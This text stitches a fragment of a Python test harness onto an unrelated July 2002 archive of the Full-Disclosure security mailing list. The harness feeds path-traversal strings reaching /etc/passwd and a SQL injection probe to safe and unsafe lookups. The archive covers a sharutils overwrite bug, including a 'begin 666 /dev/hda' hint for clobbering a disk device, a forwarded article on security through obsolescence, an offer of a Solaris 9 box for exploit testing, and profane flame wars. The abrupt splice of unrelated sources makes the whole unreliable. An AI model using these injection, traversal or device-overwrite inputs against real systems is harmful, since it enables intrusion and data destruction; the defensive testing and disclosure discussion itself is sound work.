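if __name__ == "__main__":
    print(footer_for("1"))
    for bad in ("../../../etc/passwd\x00", "../../etc/passwd"):
        try:
            footer_for(bad)
        except ValueError as e:
            print("rejected:", e)
    conn = setup_db()
    probe = "x' OR 1=1 --"   # a reviewer's test input, not a real item name
    print(describe_item_unsafe(conn, probe))   # every row, hidden ones included
    print(describe_item_safe(conn, probe))     # []
```

The advisory's other suggestion, file_exists() on the assembled path, would also catch the NUL case, but it still accepts any readable file the web server user can reach; confining the canonical path to a known root is what stops the traversal.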
From dotslash at snosoft.com  Tue Jul 16 04:50:24 2002
From: dotslash at snosoft.com (KF)
Date: Mon, 15 Jul 2002 20:50:24 -0700
Subject: [Full-Disclosure] Sharutils buggy?
References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com> <3D336A22.7090700@bokeoa.com> <3D336B9D.4050805@bokeoa.com> <3D3396C6.9020205@snosoft.com>
Message-ID: <3D339800.9000809@snosoft.com>

KF wrote:
> heh I am drunk... fuckers ambushed me in my cubicle before I left work
> ...
> -KF
> you got malloc on ppc working?
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure at lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
>

heh damn reply too...
-KF

From raju at linux-delhi.org  Tue Jul 16 02:15:50 2002
From: raju at linux-delhi.org (Raju Mathur)
Date: Tue, 16 Jul 2002 06:45:50 +0530
Subject: [Full-Disclosure] List Charter
In-Reply-To: 
References: 
Message-ID: <15667.29638.750529.713998@mail.linux-delhi.org>

>>>>> "Corey" == Corey Snow writes:

    Corey> [snip]
    Corey> #########################################################
    Corey> The information contained in this e-mail and subsequent
    Corey> attachments may be privileged, confidential and protected
    Corey> from disclosure. This transmission is intended for the
    Corey> sole use of the individual and entity to whom it is
    Corey> addressed. If you are not the intended recipient, any
    Corey> dissemination, distribution or copying is strictly
    Corey> prohibited. If you think that you have received this
    Corey> message in error, please e-mail the sender at the above
    Corey> e-mail address.
    Corey> #########################################################

You could also add that quasi-legal messages like the one above are not permitted on the list. Unless, of course, the list maintainers have enough of a legal defense fund to bear the costs of being sued for disseminating a `privileged, confidential and protected from disclosure' message despite being warned.

Oooh, you put it on Google too, you naughty boy you!

By reading this message you agree to pay me $1000 on the 3rd of each month whose name contains a vowel.

-- Raju
-- 
Raju Mathur          raju at kandalaya.org           http://kandalaya.org/
                     It is the mind that moves

From raju at linux-delhi.org  Tue Jul 16 02:51:12 2002
From: raju at linux-delhi.org (Raju Mathur)
Date: Tue, 16 Jul 2002 07:21:12 +0530
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!)
In-Reply-To: References: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu> Message-ID: <15667.31760.658428.600055@mail.linux-delhi.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "Ron" == Ron DuFresne writes: Ron> [snip] Ron> You hit on the duality of the issue before trying to Ron> refine it into a plurality issue. The *real* problem is Ron> vendors releasing buggy code with insecure defaults which Ron> *promotes* users remaining clueless. take a look at the Ron> wireless issues spewing into the airwaves now, and look at Ron> not only the default installs of the products available for Ron> playing with wireless toys and trinkets, but, take a serious Ron> look at the documentation and how much is devoted to the Ron> issue of securing the toys. Ron> [more snip] I agree that vendors are responsible for security issues to quite an extent. As far as I can see, there are three real issues for security from the vendor point of view:

1. Insecure defaults. Many vendors will sacrifice security in favour of usability. This, for some reason, seems to be even more true in the Windows world than in Linux/*BSD/Unix, where vendors try to at least make things usable but with as good an underlying security layer as possible. Redmond doesn't appear to give a d*mn about end-user security, as long as the user has a `clean, comfortable, easy usage experience'. Definitely the vendor's responsibility.

2. Insecure design and coding. IMO open source/free software has an edge here, since most of the developers don't have to work against release deadlines, unlike the proprietary software vendors. I don't accuse MS (or anyone else) of deliberately making insecure software. I do accuse them of bowing to marketing pressure and hence sacrificing due diligence in making software secure.
Further, the free software model encourages reuse of components, and my uneducated guess is that as time passes the more secure components automatically float to the top of the heap whenever reuse becomes necessary. Of course, this conveniently ignores the remote exploit in AIM which AOL itself exploited to remotely upgrade users' AIMs whenever they (AOL) upgraded the protocol (i.e. whenever someone else managed to reverse engineer the protocol and bring out a compatible third-party client :-)

3. Retrofitting security. It is completely impossible to envisage two scenarios when designing and developing software:
- How it is going to be used
- How it is going to be attacked
I'm a software writer from time to time, and all I can do as a developer is *try* to ensure that the software and protocols I develop are secure, to the best of my vision and ability. This problem is not new: earlier it was said that it was impossible to make software idiot-proof, since idiots are so smart; today I'd say that it is impossible to make software and protocols crack-proof, since crackers are too smart and varied. Until it becomes possible to project in advance all possible scenarios in which a software could be used we will never see a `secure' product or environment. Instances of security being retrofitted in this sort of situation abound: AUTH and STARTTLS extensions to SMTP, the uncountable patches from software and OS vendors, HTTPS extensions to HTTP, encryption extensions to IPv4, etc. The depressing conclusion I come to is that it will become increasingly difficult to lock down applications, protocols and operating systems; we will just have to learn to live in insecure environments.
Regards, -- Raju -- Raju Mathur raju at kandalaya.org http://kandalaya.org/ It is the mind that moves -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.6 and Gnu Privacy Guard iEYEARECAAYFAj0zfAQACgkQyWjQ78xo0X95+QCgl46cqfviPVDMoH55o96WDpWk B1wAni0wxt/AMiiSI5Lva8HshIdc0QET =Q7bh -----END PGP SIGNATURE-----

From pb at bieringer.de Tue Jul 16 08:12:53 2002 From: pb at bieringer.de (Peter Bieringer) Date: Tue, 16 Jul 2002 09:12:53 +0200 Subject: [Full-Disclosure] Sharutils buggy? In-Reply-To: <20020715232430.GA14187@fishbowl.madduck.net> References: <20020715232430.GA14187@fishbowl.madduck.net> Message-ID: <16180000.1026803573@localhost> --On Tuesday, July 16, 2002 01:24:30 AM +0200 martin f krafft wrote: > I'd like to get some educated thoughts and opinions on a recently > found potential bug: > > http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037 > http://online.securityfocus.com/bid/4742 > http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049 > http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033 > http://bugs.debian.org/149454 > http://www.kb.cert.org/vuls/id/336083 One additional memo: The original advisory and AFAIK the fixed version from RHL still do not mention that devices are also candidates for overwriting. Think about begin 666 /dev/hda ... Peter

From listuser at mobileye.co.il Tue Jul 16 11:28:05 2002 From: listuser at mobileye.co.il (Nathan Fain) Date: Tue, 16 Jul 2002 13:28:05 +0300 Subject: [Full-Disclosure] w32.frethem.k@mm and good reading References: <03c201c22c49$994e3770$1031020a@home.barrington.com> Message-ID: <3D33F535.9070405@mobileye.co.il> This method of obfuscation applies if you are only protecting a static website that doesn't deal with any security critical data (credit info, shopping, etc.) and defacement of your site is a primary concern. Script kiddies deface websites (with few exceptions).
Script kiddies run OS fingerprint scans or other scans to find their target. Yes, script kiddies will be quite fooled by this method. Otherwise you are only obfuscating your own perception of security. IP stacks are secure in their own right (I haven't heard of anyone gaining remote access by exploiting the IP stack). And this is about all you change keeping with an older OS itself. The idea of keeping older versions of services you require (ie Apache) has little application as well. It applies to the concern of stability. Once *proven* stable (left to your own interpretation) one should switch to the later version. Reason being that at some point the developers will stop looking at code in older versions all together. So even if you have the oldest version of apache with the latest patches available for it, you will likely have wide vulnerabilities in functions that are used in the code or underlying libraries. And in such a scenario, while you might have stopped script kiddies, you have left the door wide open for anyone determined to get into your system. The article applies to those whose primary concern is perhaps defacement alone. > By Robin Miller, NewsForge.com > >> Posted: 06/06/2002 at 12:10 GMT >> [724.gif] Here's an interesting way to secure an Internet-connected >> computer against intruders: Make sure the operating system and >> software it runs are so old that current hacking tools won't work on >> it. This was suggested by Brian Aker, one of the programmers who works >> on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs >> several servers of his own that host a number of small non-profit >> sites in the Seattle area. "I have one box still running a version of >> Solaris that's so old none of the script kiddies can figure it out," >> Brian says. "They tend to focus on the latest and greatest, and don't >> have the slightest idea how to handle my old Sun box."
>> Brian points out that some of the most secure Department of Defense >> Web sites -- ones that don't make headlines by getting cracked all the >> time -- run old versions of Mac OS and the venerable WebSTAR server >> suite. "[Mac is] a great operating system for that application," he >> says. "No scripting or remote capability at all, so there's no way for >> them to get in." >> Not only that, the hacker/cracker crowd is fixating, as usual, on the >> latest versions of everything, like Windows 2K/XP, Mac OS X, the most >> recent Linux kernels and BSDs, the newest Solaris, and so on. What fun >> is there in breaking into a system running something so ancient only a >> dad would even consider using it? There's also an obscurity factor to >> consider here, and not the one proprietary software advocates usually >> trot out when discussing security issues. >> True "security through obscurity" >> Most Web site takedowns and system intrusions make use of known >> vulnerabilities in a particular operating system or server software >> package. These vulnerabilities are typically discovered, a little at a >> time, by thousands of bad hackers who poke and prod at systems, >> port-scanning and probing them, sharing the information they gain from >> their (mostly failed) attempts with each other. A million monkeys with >> Internet connections may not reproduce any Shakespeare plays -- they >> need to use old-fashioned typewriters to do that -- but they sure as >> bleep are going to find vulnerabilities in any host they contact >> sooner or later simply by sheer weight of numbers, especially if the >> operating system or software they attack is popular enough that they >> have many instances of it out there to look and poke at. It doesn't >> matter whether the operating system and server software under attack >> is proprietary or Open Source. Sooner or later, with enough monkeys >> scratching at it, every single chink or opening can be discovered and >> exploited. 
>> Imagine a custom operating system used by only a few servers, running >> server software so oddball that cracking lessons learned on mainstream >> servers don't apply to it at all. Or imagine running a DOS variant or >> an OS like AIX that has never been widely used for Net-attached >> servers but is adequate for handing out simple Web pages and receiving >> responses through online forms and handling email, which are the >> primary tasks performed on most publicly-accessible servers. >> Now imagine your local script kiddie trying to crack a box running an >> operating system and server software he's never seen before, about >> which no information is available in the usual online hacker hangouts. >> Chances are, he's going to move on to an easier target. >> This is security through obscurity at its finest. Even if the custom >> operating system and server software are Open Source, low-level >> attackers aren't going to bother poring over the code thoroughly >> enough to find its vulnerabilities, and those few who have the skill >> level needed almost certainly have better things to do with their time >> -- like work -- and won't bother. >> Really dumb stuff >> Never forget, most intrusions and defacements exploit really stupid >> administrator or user mistakes, like using "password" as the password >> for remote access or running all kinds of unnecessary services that >> create security holes so big a whale could dive through them. These >> lapses have nothing to do with the operating system or software being >> used. No operating system or application ever written is immune to >> user stupidity. Some just take more stupidity to botch than others, >> you might say. But that's enough about that. Let's go back to talking >> about old operating systems. >> Age before beauty >> One advantage of mature software is that lots of people have already >> tried to crack it and lots of patches have been written. 
A smart >> sysadmin like Brian, running an ancient version of Solaris, has kept >> up with security updates over the years and has installed all of them >> he has found. What some people might sneer at as "obsolete" software, >> others might call "carefully tested" or "proven." Indeed, Debian Linux >> users often point to the fact that Debian's stable branch does not >> include the latest kernel or software as one of its great strengths; >> Debian lets others explore the latest and greatest -- and fall victim >> to the latest and greatest exploits -- before all the kinks are worked >> out to the Debian maintainers' satisfaction. >> Note that an awful lot of servers out there are still running on Red >> Hat 6.1 or 6.2, not Red Hat 7.x, and that it takes a long time for the >> latest version of Apache to trickle out into the world full-strength. >> Because these programs have zero licensing cost attached to updates, >> why would so many sysadmins keep using old versions when new ones no >> doubt offer more and slicker features? Obviously, those sysadmins have >> the same outlook as delivery truck fleet managers who refuse to buy a >> new model during its first year or two in production. They prefer to >> wait until all the kinks are worked out and all the defects and >> maintenance tricks have been discovered and applied by early adopters >> before jumping from the tried and true into something new. >> This is sane behavior for a conservative business manager whether she >> is running a fleet of Web servers or a fleet of trucks -- or even a >> fleet of Web servers for a trucking company. But it may be even more >> sane to hold on to the same servers and trucks even when others sneer >> at them as being old, even if new versions are smoother and easier to >> administer or drive. Quite simply, once you have worked with a piece >> of software or a truck for a number of years, you know its quirks >> inside and out. 
When it acts up in a subtle way someone not used to it >> might not even notice, long experience with it can point an observant >> sysadmin or mechanic straight to a problem, thereby saving downtime >> and repair costs. >> Because "Total Cost of Ownership" is the big management buzz phrase >> that cuts across all business areas, and anything new requires a >> learning curve, sometimes it is best to just keep on using the old >> whatever as long as it does its job reasonably well. >> At some point -- hopefully before Microsoft stops supporting it -- >> Windows NT may be reasonably secure against most common exploits. If >> nothing else, by that time there will be hundreds of thousands of >> sysadmins who have learned how to secure it as hard as possible, even >> if they had to learn some lessons the hard way -- by getting cracked. >> At the same time, the script kiddies and malicious hackers who ran >> roughshod over NT servers when they first appeared have aged. Most of >> them probably have jobs and responsibilities by now, and aren't >> getting their kicks playing in other people's systems but are busily >> securing ones they run themselves. >> The next generation of bad-kid hackers probably won't mess much with >> NT -- or pre-X Mac OS or Linux pre-2.5 kernels or Apache pre-2.x or >> any of the other operating systems and server applications their >> fathers or older siblings ran "back in the day," while those same >> fathers and older siblings will have piled up endless experience >> securing those old, now-obscure programs, making them harder targets >> than the latest stuff. >> You never read about this kind of "security through obscurity," which >> can just as correctly be called "security through obsolescence." >> Despite this lack of publicity, it may be as effective a tactic as any >> other, and it can be implemented without spending a dime. >> © Newsforge.
All rights reserved > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure >

From core at bokeoa.com Tue Jul 16 12:00:56 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Tue, 16 Jul 2002 05:00:56 -0600 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> <16180000.1026803573@localhost> Message-ID: <3D33FCE8.40605@bokeoa.com> That's just plain evil, Peter! ;) peace, core Peter Bieringer wrote: > > --On Tuesday, July 16, 2002 01:24:30 AM +0200 martin f krafft > wrote: > > >>I'd like to get some educated thoughts and opinions on a recently >>found potential bug: >> >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037 >> http://online.securityfocus.com/bid/4742 >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049 >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033 >> http://bugs.debian.org/149454 >> http://www.kb.cert.org/vuls/id/336083 > > > One additional memo: > > The original advisory and AFAIK the fixed version from RHL still do not > mention that devices are also candidates for overwriting. > > Think about > > begin 666 /dev/hda > ... > > > Peter > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > >

From csnow at deltadentalwa.com Tue Jul 16 18:15:03 2002 From: csnow at deltadentalwa.com (Snow, Corey) Date: Tue, 16 Jul 2002 10:15:03 -0700 Subject: [Full-Disclosure] List Charter Message-ID: There are many people who use mailing lists from a facility or system where they have no control over what the mail system appends to outgoing email, regardless of the address. I'm not the only one on this list whose email has such disclaimers attached to it.
I could also suggest that asinine, puerile flame-bait that doesn't contribute to the positive side of the signal to noise ratio on the list should be forbidden, but really- that's just common sense. Corey M. Snow- csnow at deltadentalwa.com I don't speak for my employer. > -----Original Message----- > From: Raju Mathur [mailto:raju at linux-delhi.org] > Sent: Monday, July 15, 2002 6:16 PM > To: full-disclosure at lists.netsys.com > Subject: RE: [Full-Disclosure] List Charter > > > >>>>> "Corey" == Corey Snow writes: > > Corey> [snip] > > Corey> ######################################################### > Corey> The information contained in this e-mail and subsequent > Corey> attachments may be privileged, confidential and protected > Corey> from disclosure. This transmission is intended for the > Corey> sole use of the individual and entity to whom it is > Corey> addressed. If you are not the intended recipient, any > Corey> dissemination, distribution or copying is strictly > Corey> prohibited. If you think that you have received this > Corey> message in error, please e-mail the sender at the above > Corey> e-mail address. > Corey> ######################################################### > > You could also add that quasi-legal messages like the one above are > not permitted on the list. Unless, of course, the list maintainers > have enough of a legal defense fund to bear the costs of being sued > for disseminating a `privileged, confidential and protected from > disclosure' message despite being warned. > > Oooh, you put it on Google too, you naughty boy you! > > By reading this message you agree to pay me $1000 on the 3rd of each > month whose name contains a vowel. > > -- Raju > -- > Raju Mathur raju at kandalaya.org http://kandalaya.org/ It is the mind that moves _______________________________________________ Full-Disclosure - We believe in it. 
Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure ######################################################### The information contained in this e-mail and subsequent attachments may be privileged, confidential and protected from disclosure. This transmission is intended for the sole use of the individual and entity to whom it is addressed. If you are not the intended recipient, any dissemination, distribution or copying is strictly prohibited. If you think that you have received this message in error, please e-mail the sender at the above e-mail address. ######################################################### From steve at entrenchtech.com Tue Jul 16 18:54:40 2002 From: steve at entrenchtech.com (Steve) Date: Tue, 16 Jul 2002 11:54:40 -0600 Subject: [Full-Disclosure] List Charter References: Message-ID: <005d01c22cf1$db917a40$f954b8a1@entrenchtech.com> All flames aside, what I find amusing about these email disclaimers is that they don't have a legal leg to stand on in North America (USA and Canada). They are nothing but a waste of email space. ----- Original Message ----- From: "Snow, Corey" To: Sent: Tuesday, July 16, 2002 11:15 AM Subject: RE: [Full-Disclosure] List Charter > There are many people who use mailing lists from a facility or system where > they have no control over what the mail system appends to outgoing email, > regardless of the address. I'm not the only one on this list whose email has > such disclaimers attached to it. > > I could also suggest that asinine, puerile flame-bait that doesn't > contribute to the positive side of the signal to noise ratio on the list > should be forbidden, but really- that's just common sense. > > Corey M. Snow- csnow at deltadentalwa.com > I don't speak for my employer. 
> > > > -----Original Message----- > > From: Raju Mathur [mailto:raju at linux-delhi.org] > > Sent: Monday, July 15, 2002 6:16 PM > > To: full-disclosure at lists.netsys.com > > Subject: RE: [Full-Disclosure] List Charter > > > > > > >>>>> "Corey" == Corey Snow writes: > > > > Corey> [snip] > > > > Corey> ######################################################### > > Corey> The information contained in this e-mail and subsequent > > Corey> attachments may be privileged, confidential and protected > > Corey> from disclosure. This transmission is intended for the > > Corey> sole use of the individual and entity to whom it is > > Corey> addressed. If you are not the intended recipient, any > > Corey> dissemination, distribution or copying is strictly > > Corey> prohibited. If you think that you have received this > > Corey> message in error, please e-mail the sender at the above > > Corey> e-mail address. > > Corey> ######################################################### > > > > You could also add that quasi-legal messages like the one above are > > not permitted on the list. Unless, of course, the list maintainers > > have enough of a legal defense fund to bear the costs of being sued > > for disseminating a `privileged, confidential and protected from > > disclosure' message despite being warned. > > > > Oooh, you put it on Google too, you naughty boy you! > > > > By reading this message you agree to pay me $1000 on the 3rd of each > > month whose name contains a vowel. > > > > -- Raju > > -- > > Raju Mathur raju at kandalaya.org > http://kandalaya.org/ > It is the mind that moves > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > ######################################################### > The information contained in this e-mail and subsequent attachments may be privileged, > confidential and protected from disclosure. 
This transmission is intended for the sole > use of the individual and entity to whom it is addressed. If you are not the intended > recipient, any dissemination, distribution or copying is strictly prohibited. If you > think that you have received this message in error, please e-mail the sender at the above > e-mail address. > ######################################################### > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure From pauls at utdallas.edu Tue Jul 16 19:24:03 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Tue, 16 Jul 2002 13:24:03 -0500 Subject: [Full-Disclosure] List Charter Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE799@UTDEVS02.campus.ad.utdallas.edu> Yet every law firm has one....... Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: Steve [mailto:steve at entrenchtech.com] > Sent: Tuesday, July 16, 2002 12:55 PM > To: full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] List Charter > > > All flames aside, what I find amusing about these email > disclaimers is that they don't have a legal leg to stand on > in North America (USA and Canada). They are nothing but a > waste of email space. From core at bokeoa.com Tue Jul 16 19:36:24 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Tue, 16 Jul 2002 12:36:24 -0600 Subject: [Full-Disclosure] List Charter References: <871080DEC5874D41B4E3AFC5C400611E026EE799@UTDEVS02.campus.ad.utdallas.edu> Message-ID: <3D3467A8.8000206@bokeoa.com> I have to give you people credit you've managed to talk about lots of bullshit. Post some exploits or shut the fuck up! peace, core Schmehl, Paul L wrote: > Yet every law firm has one....... 
> > Paul Schmehl (pauls at utdallas.edu) > Supervisor of Support Services > The University of Texas at Dallas > AVIEN Founding Member > http://www.utdallas.edu/~pauls/ > > > >>-----Original Message----- >>From: Steve [mailto:steve at entrenchtech.com] >>Sent: Tuesday, July 16, 2002 12:55 PM >>To: full-disclosure at lists.netsys.com >>Subject: Re: [Full-Disclosure] List Charter >> >> >>All flames aside, what I find amusing about these email >>disclaimers is that they don't have a legal leg to stand on >>in North America (USA and Canada). They are nothing but a >>waste of email space. > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From steve at entrenchtech.com Tue Jul 16 19:40:02 2002 From: steve at entrenchtech.com (Steve) Date: Tue, 16 Jul 2002 12:40:02 -0600 Subject: [Full-Disclosure] List Charter References: <871080DEC5874D41B4E3AFC5C400611E026EE799@UTDEVS02.campus.ad.utdallas.edu> <3D3467A8.8000206@bokeoa.com> Message-ID: <007701c22cf8$31f497e0$f954b8a1@entrenchtech.com> Sorry to bother you o l33t h4x04 one. not! assclown ----- Original Message ----- From: "Charles 'core' Stevenson" To: Sent: Tuesday, July 16, 2002 12:36 PM Subject: Re: [Full-Disclosure] List Charter > I have to give you people credit you've managed to talk about lots of > bullshit. Post some exploits or shut the fuck up! > > peace, > core > > Schmehl, Paul L wrote: > > Yet every law firm has one....... 
> > > > Paul Schmehl (pauls at utdallas.edu) > > Supervisor of Support Services > > The University of Texas at Dallas > > AVIEN Founding Member > > http://www.utdallas.edu/~pauls/ > > > > > > > >>-----Original Message----- > >>From: Steve [mailto:steve at entrenchtech.com] > >>Sent: Tuesday, July 16, 2002 12:55 PM > >>To: full-disclosure at lists.netsys.com > >>Subject: Re: [Full-Disclosure] List Charter > >> > >> > >>All flames aside, what I find amusing about these email > >>disclaimers is that they don't have a legal leg to stand on > >>in North America (USA and Canada). They are nothing but a > >>waste of email space. > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Full-Disclosure at lists.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure

From arawak at blueyonder.co.uk Tue Jul 16 20:52:14 2002 From: arawak at blueyonder.co.uk (arawak) Date: Tue, 16 Jul 2002 20:52:14 +0100 Subject: [Full-Disclosure] List Charter In-Reply-To: <007701c22cf8$31f497e0$f954b8a1@entrenchtech.com> Message-ID: What is happening with this list? Somehow it is losing the battle with people trying to undermine what could be a really informative list. Is moderation the answer? Profanity & useless tittle tattle does nothing but make the list close down. Is there some underhand subversiveness pushing the list off the net? Luck is my game ;-) Openness is my aim :) A :-) -----Original Message----- From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Steve Sent: Tuesday, July 16, 2002 7:40 PM To: full-disclosure at lists.netsys.com Subject: Re: [Full-Disclosure] List Charter Sorry to bother you o l33t h4x04 one. not!
assclown ----- Original Message ----- From: "Charles 'core' Stevenson" To: Sent: Tuesday, July 16, 2002 12:36 PM Subject: Re: [Full-Disclosure] List Charter > I have to give you people credit you've managed to talk about lots of > bullshit. Post some exploits or shut the fuck up! > > peace, > core > > Schmehl, Paul L wrote: > > Yet every law firm has one....... > > > > Paul Schmehl (pauls at utdallas.edu) > > Supervisor of Support Services > > The University of Texas at Dallas > > AVIEN Founding Member > > http://www.utdallas.edu/~pauls/ > > > > > > > >>-----Original Message----- > >>From: Steve [mailto:steve at entrenchtech.com] > >>Sent: Tuesday, July 16, 2002 12:55 PM > >>To: full-disclosure at lists.netsys.com > >>Subject: Re: [Full-Disclosure] List Charter > >> > >> > >>All flames aside, what I find amusing about these email > >>disclaimers is that they don't have a legal leg to stand on > >>in North America (USA and Canada). They are nothing but a > >>waste of email space. > > > > _______________________________________________ > > Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure From len at netsys.com Tue Jul 16 22:51:41 2002 From: len at netsys.com (Len Rose) Date: Tue, 16 Jul 2002 17:51:41 -0400 Subject: [Full-Disclosure] List Charter In-Reply-To: ; from arawak@blueyonder.co.uk on Tue, Jul 16, 2002 at 08:52:14PM +0100 References: <007701c22cf8$31f497e0$f954b8a1@entrenchtech.com> Message-ID: <20020716175141.E558@netsys.com> I'd say give it some time.. it's only been alive a short time. 
The more technical and less conversational the better. Those are just my opinions, though.. ultimately the readers will decide whether it's useful or not. Len On Tue, Jul 16, 2002 at 08:52:14PM +0100, arawak wrote: > What is happening with this list? > > Somehow it is losing the battle with people trying > to undermine what could be a really informative list. > > Is moderation the answer? > > Profanity & useless tittle tattle does nothing but > make the list close down. > > Is there some underhand subversiveness pushing the > list off the net? > > Luck is my game ;-) > Openness is my aim :) > > A :-) >

From len at netsys.com Tue Jul 16 23:04:33 2002 From: len at netsys.com (Len Rose) Date: Tue, 16 Jul 2002 18:04:33 -0400 Subject: [Full-Disclosure] solaris 9 playpen Message-ID: <20020716180433.G558@netsys.com> Who would be interested in access to a sparc machine running solaris 9 for exploit testing? I'm thinking about allowing access to a few people who would like to work on things like examining the buffer overflow in solaris 9 rcp :) Access would be granted on the basis of obtaining full and legitimate contact information, phone numbers, etc. We'd also need IP addresses for firewall filters, etc. Just thought I'd throw the idea out there. Contact me off list and I'll collect information.. Len

From sert at snosoft.com Tue Jul 16 19:11:51 2002 From: sert at snosoft.com (John Scimone) Date: Tue, 16 Jul 2002 18:11:51 +0000 Subject: [Full-Disclosure] solaris 9 playpen In-Reply-To: <20020716180433.G558@netsys.com> References: <20020716180433.G558@netsys.com> Message-ID: <200207161811.51984.sert@snosoft.com> I like this idea, if I had more time this week I would volunteer, however, when the research goes underway on that overflow please keep the list updated, it will be nice to read some useful information on the list for once. G'day.
-sert Secure Network Operations www.snosoft.com On Tuesday 16 July 2002 10:04 pm, Len Rose wrote: > Who would be interested in access to a sparc machine > running solaris 9 for exploit testing? I'm thinking > about allowing access to a few people who would like > to work on things like examining the buffer overflow in > solaris 9 rcp :) > > Access would be granted on the basis of obtaining full > and legitimate contact information, phone numbers, etc. > > We'd also need IP addresses for firewall filters, etc. > > Just thought I'd throw the idea out there. > > Contact me off list and I'll collect information.. > > Len > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure From dotslash at snosoft.com Wed Jul 17 05:14:36 2002 From: dotslash at snosoft.com (KF) Date: Tue, 16 Jul 2002 21:14:36 -0700 Subject: [Full-Disclosure] default list reply-to: address References: <20020716180433.G558@netsys.com> Message-ID: <3D34EF2C.50901@snosoft.com> does the default reply to: HAVE to be the list address instead of the individual that sent it? I assume this was a choice config option during the list setup? I find my self wanting to reply only to the individual the wrote the email however when reply or reply to all is clicked the only address is full-disclosure at lists.netsys.com... can be a pain in the arse if in a hurry ... I think I have sent some cute comments out at least twice during a hasty reply. 
-KF From dufresne at winternet.com Wed Jul 17 02:34:33 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Tue, 16 Jul 2002 20:34:33 -0500 (CDT) Subject: [Full-Disclosure] List Charter In-Reply-To: <20020716175141.E558@netsys.com> Message-ID: I can't help but get the impression from some of the comments that certain folks expect nothing more then a technical advisories list and seeing the array of other threads, that some are really looking for a list in which to dicuss various aspects of security. some are seeking another bugtraq type list, unmoderated, while others seem to be seeking something on the order of the firewalls and firewalls wizards lists. The evolution of the list will be interesting, as new lists tend to be . Thanks, Ron DuFresne On Tue, 16 Jul 2002, Len Rose wrote: > I'd say give it some time.. it's only been alive a short > time. The more technical and less conversational the better. > > Those are just my opinions, though.. ultimately the readers > will decide whether it's useful or not. > > Len > > On Tue, Jul 16, 2002 at 08:52:14PM +0100, arawak wrote: > > What is happening with this list ? > > > > Somehow it is loosing the battle with people trying > > to undermine what could be really informative list. > > > > Is moderation the answer? > > > > Profanity & useless tittle tattle does nothing but > > make the list close down. > > > > Is there some underhand subversiveness pushing the > > list off the net? > > > > Luck is my game ;-) > > Openess is my aim :) > > > > A :-) > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." 
-- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.

From mail at blazde.co.uk Wed Jul 17 02:44:24 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Wed, 17 Jul 2002 02:44:24 +0100
Subject: [Full-Disclosure] default list reply-to: address
References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com>
Message-ID: <001501c22d33$7d2628b0$0a00a8c0@violetclub>

> Does the default Reply-To: HAVE to be the list address instead of the
> individual that sent it? I assume this was a choice config option during
> the list setup? I find myself wanting to reply only to the individual
> who wrote the email; however, when reply or reply-to-all is clicked the
> only address is full-disclosure at lists.netsys.com... can be a pain in the
> arse if in a hurry ... I think I have sent some cute comments out at
> least twice during a hasty reply.

